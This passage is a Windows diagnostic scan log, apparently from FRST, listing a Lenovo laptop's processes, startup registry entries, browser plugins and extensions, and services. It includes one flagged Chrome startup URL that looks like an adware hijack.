(PointGrab LTD) C:\Program Files (x86)\Lenovo\Motion Control\PGService.exe
(Hewlett-Packard) C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(Lenovo) C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionPusher.exe
(Lenovo) C:\ProgramData\LenovoTransition\Server\x64\ymc.exe
Failed to access process -> Memory Compression
(Examsoft Worldwide Inc.) C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.SoftShield.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.17012.10301.0_x64__8wekyb3d8bbwe\Video.UI.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(VideoLAN) C:\Program Files\VideoLAN\VLC\vlc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe [111976 2013-08-02] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13653208 2013-09-12] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-30] (Realtek Semiconductor)
HKLM\...\Run: [RtsFT] => C:\WINDOWS\RTFTrack.exe [6340312 2013-07-19] (Realtek semiconductor)
HKLM\...\Run: [IgfxTray] => C:\windows\system32\igfxtray.exe [401896 2016-11-01] ()
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [Yoga PhoneCompanion] => C:\Program Files\Lenovo Yoga PhoneCompanion\Yoga Phone Companion.exe [844304 2013-10-26] (Lenovo)
HKLM\...\Run: [AutoStartTransition] => C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe [294672 2013-10-26] ()
HKLM\...\Run: [Energy Manager] => C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe [59925488 2013-10-26] (Lenovo(beijing) Limited)
HKLM\...\Run: [Lenovo Utility] => C:\Program Files (x86)\Lenovo\Energy Manager\Utility.exe [80880 2013-10-26] (Lenovo(beijing) Limited)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-06-03] (Synaptics Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-11-01] (Apple Inc.)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-24] (Microsoft Corporation)
HKLM-x32\...\Run: [Lenovo App Shop] => C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismagent.exe [156000 2013-07-18] (Intel Corporation)
HKLM-x32\...\Run: [Yoga Picks] => C:\Program Files (x86)\Lenovo\Yoga Picks\Yoga Picks.exe [90640 2013-07-09] (Lenovo)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [AirDroid 3] => C:\Program Files (x86)\AirDroid\AirDroid.exe [8696832 2016-08-04] (Sand Studio)
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1116504 2017-02-01] (Google Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
Startup: C:\Users\007\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-11-07]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk [2015-11-07]
ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{0d251055-31ed-48ea-b574-65a04995c8e1}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{0dde9330-8214-11e6-8a54-806e6f6e6963}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{53DD74C5-F1D5-44B3-BC64-FE64C0F20AF1}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{adee8c85-6405-43ab-b5ce-70bbec9c5305}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{e5a2d9d9-828e-453f-8fae-e6e1988b15eb}: [NameServer] 8.8.8.8

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://home.lenovo.com
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://home.lenovo.com
SearchScopes: HKLM -> DefaultScope {DA333138-ED30-42B1-BFA9-F83C9197A11D} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2015-11-07] (LastPass)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-08-04] (Oracle Corporation)
BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll [2015-11-07] (LastPass)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-08-04] (Oracle Corporation)
Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2015-11-07] (LastPass)
Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll [2015-11-07] (LastPass)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-07-29] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2012-06-01] (Skype Technologies)
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\System32\tbauth.dll [2016-07-16] (Microsoft Corporation)
Handler-x32: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll [2016-07-16] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_221.dll [No File]
FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2015-11-07] (LastPass)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_221.dll [No File]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-08-08] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-08-08] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-08-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-08-04] (Oracle Corporation)
FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2015-11-07] (LastPass)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-12] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-11-08] (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 8\npnitromozilla.dll [2013-06-28] (Nitro PDF)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3283718265-1983809055-1317204610-1001: intel.com/AppUp -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp.dll [2013-07-18] (Intel)
FF Plugin HKU\S-1-5-21-3283718265-1983809055-1317204610-1001: intel.com/AppUpx64 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll [2013-07-18] (Intel)
FF Extension: Video DownloadHelper - C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-01-02]
FF Extension: Adblock Plus - C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-01-02]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2017-01-22]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/ig
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggQcVwABFtEGBhAcgEITA1AQwwOeA4OBRRDRQxCJgBcVlhBRAwFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEgVFxAK3JWDk4="
CHR Profile: C:\Users\007\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-07]
CHR Extension: (Google Docs) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-07]
CHR Extension: (Google Drive) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-07]
CHR Extension: (YouTube) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-07]
CHR Extension: (Google Cast) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2015-11-10]
CHR Extension: (Adblock Plus) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-11-07]
CHR Extension: (Pushbullet) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\chlffgpmiacpedhhbkiomidkjlcfhogd [2015-11-07]
CHR Extension: (Videostream for Google Chromecast™) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnciopoikihiagdjbjpnocolokfelagl [2015-11-07]
CHR Extension: (Google Search) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-07]
CHR Extension: (Google Calendar) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-11-07]
CHR Extension: (Google Sheets) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-07]
CHR Extension: (Google Docs Offline) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-07]
CHR Extension: (AdBlock) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-11-07]
CHR Extension: (TinEye Reverse Image Search) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\haebnnbpedcbhciplfhjjkbafijpncjl [2015-11-07]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-01-22]
CHR Extension: (IE Tab) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hehijbfgiekmjfkfjpbkbammjbdenadd [2015-11-07]
CHR Extension: (feedly) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipbfijinpcgfogaopmgehiegacbhmob [2016-06-13]
CHR Extension: (goo.gl URL Shortener) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\iblijlcdoidgdpfknkckljiocdbnlagk [2015-11-07]
CHR Extension: (Google Play Music) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\icppfcnhkcmnfdhfhphakoifcfokfdhg [2015-11-07]
CHR Extension: (Google Maps) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-11-07]
CHR Extension: (RSS Subscription Extension (by Google)) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbjncdgjeocebhnmkbbbdekmmmcbfjd [2015-11-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-07]
CHR Extension: (Remote Torrent Adder) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\oabphaconndgibllomdcjbfdghcmenci [2015-11-07]
CHR Extension: (Gmail) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-07]
CHR Extension: (Chrome Media Router) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-08-02]
CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [433688 2016-01-07] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [413208 2016-01-07] (BlueStack Systems, Inc.)
S3 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [859672 2016-01-07] (BlueStack Systems, Inc.)
S2 CDPUserSvc; C:\Windows\System32\CDPUserSvc.dll [339456 2016-11-11] (Microsoft Corporation)
R2 CDPUserSvc_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 CDPUserSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [3042032 2017-01-17] (Microsoft Corporation)
S4 DACoreService; C:\Program Files (x86)\Nuance\Dragon Assistant\Core\DACore.exe [432528 2013-05-02] (Nuance Communications, Inc.)
R2 DptfParticipantProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [115632 2013-08-02] (Intel Corporation)
R2 DptfPolicyConfigTDPService; C:\Windows\system32\DptfPolicyConfigTDPService.exe [116656 2013-08-02] (Intel Corporation)
R2 DptfPolicyCriticalService; C:\Windows\system32\DptfPolicyCriticalService.exe [148688 2013-08-02] (Intel Corporation)
R2 DptfPolicyLpmService; C:\Windows\system32\DptfPolicyLpmService.exe [124880 2013-08-02] (Intel Corporation)
S3 FrameServer; C:\Windows\system32\FrameServer.dll [805888 2016-11-02] (Microsoft Corporation)
S3 HvHost; C:\Windows\System32\hvhostsvc.dll [67584 2016-07-16] (Microsoft Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [373744 2016-11-01] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel(R) Corporation)
R2 Intel(R) Wireless Bluetooth(R) 4.0 Radio Management; C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe [155448 2013-09-20] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-08-08] (Intel Corporation)
R2 LsvUIService; C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvUIService.exe [70416 2013-10-26] (Lenovo)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MessagingService; C:\Windows\System32\MessagingService.dll [52224 2016-07-16] (Microsoft Corporation)
S3 MessagingService_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
S3 MessagingService_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2014-04-08] (Motorola Mobility LLC)
R2 NitroDriverReadSpool8; C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe [230408 2013-06-28] (Nitro PDF Software)
R2 OneSyncSvc_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 OneSyncSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 PGService; C:\Program Files (x86)\Lenovo\Motion Control\PGService.exe [162600 2013-08-29] (PointGrab LTD)
R2 PhoneCompanionPusher; C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionPusher.exe [249872 2013-10-26] (Lenovo)
S3 PhoneCompanionVap; C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionVap.exe [328720 2013-10-26] (Lenovo)
R3 PimIndexMaintenanceSvc_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 PimIndexMaintenanceSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [390632 2012-04-24] ()
S3 RmSvc; C:\Windows\System32\RMapi.dll [140800 2016-09-15] (Microsoft Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [288472 2013-09-13] (Realtek Semiconductor)
S4 shpamsvc; C:\Windows\system32\Windows.SharedPC.AccountManager.dll [161792 2016-07-16] (Microsoft Corporation)
R2 SoftshieldService; C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe [67848 2016-11-02] (Hewlett-Packard)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [249032 2015-06-03] (Synaptics Incorporated)
